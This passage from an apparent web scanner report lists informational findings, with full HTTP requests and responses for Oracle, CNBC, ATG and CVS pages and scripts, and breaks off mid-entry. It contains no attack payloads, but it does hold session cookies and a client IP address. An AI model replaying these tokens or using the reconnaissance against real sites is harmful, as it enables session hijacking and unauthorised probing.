Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_cc=true; s_nr=1315343797232; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleblogs%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:38 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30195555395017574,0)
Last-Modified: Fri, 11 Feb 2011 22:10:22 GMT
Content-Length: 164

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...FIDATx.b......01..(.x.....G.;.....QW~....h,.....FK...l$..._.}..:... ....G...U.....IEND.B`.

27.24. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/logo-oracle-red.png

Request

GET /EndUser/images/logo-oracle-red.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:21 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186767891789108,1)
Last-Modified: Thu, 29 Oct 2009 05:53:52 GMT
Content-Length: 908

.PNG
.
...IHDR...w...........&.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....Q*A.......d .H....H.b.b.d f..`.....p....a.=M    ..{..........g.t..].Sd...]...D..d.3.............|.....
...[SNIP]...

27.25. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code.js

Request

GET /EndUser/jscripts/s_code.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:35 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=40;ecid=30186712057213538,0)
Content-Length: 30025

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

27.26. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_popup.js

Request

GET /EndUser/jscripts/s_code_popup.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:38 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 28 Mar 2011 10:28:50 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=161;ecid=30186686287409627,0)
Content-Length: 233

var popupWindow = null;
var flag = 0;

function openPopup(url)
{
try
{
popupWindow = window.open(url, "popup_id", "scrollbars,resizable,width=800,height=600");
}
catch (err)
{
flag = '1' +
...[SNIP]...

27.27. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_profile.js

Request

GET /EndUser/jscripts/s_code_profile.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:29:47 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 14 Jul 2010 22:00:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=249;ecid=30186699172311517,0)
Content-Length: 1366

/* Setting the s_account */
function s_setAccount(){

var s_account="";

var curUrl = location.href;

if(curUrl.indexOf(":7101") != -1 || curUrl.indexOf("-mktad") != -1 || curUrl.index
...[SNIP]...

27.28. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_validation.js

Request

GET /EndUser/jscripts/s_validation.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:09:35 GMT
Accept-Ranges: bytes
Last-Modified: Fri, 18 Mar 2011 13:50:52 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=242;ecid=30186729237082835,0)
Content-Length: 4274

/* Used to attach and remove error message which are not set or removed on
* server side validators.
*/
function checkOnLoad()
{
var inputs = document.getElementsByTagName('input');
var spans =
...[SNIP]...

27.29. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oracleus.wingateweb.com
Path:   /portal/dwr/interface/PortalAjax.js

Request

GET /portal/dwr/interface/PortalAjax.js HTTP/1.1
Host: oracleus.wingateweb.com
Connection: keep-alive
Referer: https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcrj6SogYwvr-3-LC-it

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 15:54:15 GMT
Content-Length: 1726


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (PortalAjax == null) var PortalA
...[SNIP]...

27.30. https://register.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /

Request

GET / HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 13 Aug 2009 22:54:28 GMT
ETag: "3b-4710dd15eb100"
Accept-Ranges: bytes
Content-Length: 59
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

<script>
window.location="http://www.cnbc.com";
</script>

27.31. https://register.cnbc.com/email/EmailSupport.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /email/EmailSupport.jsp

Request

GET /email/EmailSupport.jsp HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/
Content-Length: 91322


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <script lang="javascript" src="js/subjects.js"></script>
<title>Contact Customer Service</
...[SNIP]...

27.32. https://shop.oracle.com/pls/ostore/f

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.oracle.com
Path:   /pls/ostore/f

Request

GET /pls/ostore/f?p=700:2:0::NO:RP,2:PROD_HIER_ID:4509881204651805720002 HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/community/developer-vm/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343714603; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Ftechnetwork%2Fcommunity%2Fdeveloper-vm%2Findex.html; s_sq=oracleotnlive%2Coracleglobal%3D%2526pid%253Dotn%25253Aen-us%25253A%25252Fcommunity%25252Fdeveloper-vm%25252F%2526pidt%253D1%2526oid%253Dotn%25253Aen%25253Ahnav%25253Astore%25253Astoredatabase%25253Astoredatabaseseeall%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:15:20 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 515
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<html>
<head><script type="text/javascript">
function detectTimeZone(){
var lGmtHours = -(new Date()).getTimezoneOffset();
var lHours = parseInt(lGmtHours/60);
var lMinutes = lGmtHours%60;
window.loca
...[SNIP]...

27.33. https://support.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.oracle.com
Path:   /

Request

GET / HTTP/1.1
Host: support.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:16 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Sat, 13 Aug 2011 04:17:35 GMT
ETag: "1827ecb-9f-4aa5b4f3d35c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 159
Keep-Alive: timeout=15, max=1799
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<HTML>
<HEAD>
<title>Oracle Configuration Support Manager</title>
<meta http-equiv="REFRESH" content="0;url=/CSP/ui/flash.html"></HEAD>
<BODY>
</BODY>
</HTML>

27.34. https://support.oracle.com/CSP/ui/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.oracle.com
Path:   /CSP/ui/blank.html

Request

GET /CSP/ui/blank.html HTTP/1.1
Host: support.oracle.com
Connection: keep-alive
Referer: https://support.oracle.com/CSP/ui/flash.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; gpv_p24=no%20value; s_nr=1315343469265; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Aheader%25253Acreateorupdateservicerequest%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServersupport_http_pool1=590844557.24862.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:15 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Thu, 29 Oct 2009 11:44:00 GMT
ETag: "f72724-0-477116d600000"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=1800
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en


27.35. https://support.oracle.com/CSP/ui/flash.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.oracle.com
Path:   /CSP/ui/flash.html

Request

GET /CSP/ui/flash.html HTTP/1.1
Host: support.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; gpv_p24=no%20value; s_nr=1315343469265; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Aheader%25253Acreateorupdateservicerequest%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:13 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Sat, 27 Aug 2011 04:00:37 GMT
ETag: "fa0651-f51-4ab74b4570340"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3921
Keep-Alive: timeout=15, max=1799
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<!-- saved from url=(0014)about:internet -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<title>My Oracle Support</title>
<meta name="title"
...[SNIP]...

27.36. https://support.oracle.com/CSP/ui/xml/sunConnect.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.oracle.com
Path:   /CSP/ui/xml/sunConnect.html

Request

GET /CSP/ui/xml/sunConnect.html HTTP/1.1
Host: support.oracle.com
Connection: keep-alive
Referer: https://support.oracle.com/CSP/ui/flash.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_nr=1315343469265; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; BIGipServersupport_http_pool1=590844557.24862.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Aheader%25253Acreateorupdateservicerequest%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:17 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Tue, 09 Aug 2011 00:21:30 GMT
ETag: "13ec3f8-1ea-4aa078b92f680"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 490
Keep-Alive: timeout=15, max=1793
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<html>
<head>
<script type="text/javascript">

function connectByForm(sessionToken, sunConnectUrl, doc) {

var form = doc.getElementById("connectByForm");

if (sessionToken) {
var stElem = doc
...[SNIP]...

27.37. https://www.atg.com/dojo-1/dijit/nls/loading.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /dojo-1/dijit/nls/loading.js

Request

GET /dojo-1/dijit/nls/loading.js HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Last-Modified: Wed, 10 Jun 2009 23:02:08 GMT
ETag: 1244674928000
Content-Length: 74
Content-Type: application/x-javascript
Cache-Control: max-age=86399
Expires: Wed, 07 Sep 2011 15:38:00 GMT
Date: Tue, 06 Sep 2011 15:38:01 GMT
Connection: keep-alive
Vary: Accept-Encoding

({"loadingState": "Loading...", "errorState": "Sorry, an error occurred"})

27.38. https://www.atg.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:55 GMT
ETag: "60643-8f6-48bbf4be29ec0"
Accept-Ranges: bytes
Content-Length: 2294
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=86389
Expires: Wed, 07 Sep 2011 15:38:06 GMT
Date: Tue, 06 Sep 2011 15:38:17 GMT
Connection: keep-alive

..............h...&...........h.......(....... ...........@....................]...R...u.......e.......Y...a...$...............$.......u.......4...........3...M...........)...Y.......A...............
...[SNIP]...

27.39. https://www.cvs.com/CVSApp/html/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cvs.com
Path:   /CVSApp/html/blank.html

Request

GET /CVSApp/html/blank.html HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: https://www.cvs.com/CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362832
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345643244:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:32 GMT
Server: Apache
Last-Modified: Wed, 07 May 2008 10:03:57 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:32 GMT
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


27.40. https://www.cvs.com/CVSApp/user/forgot_password.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cvs.com
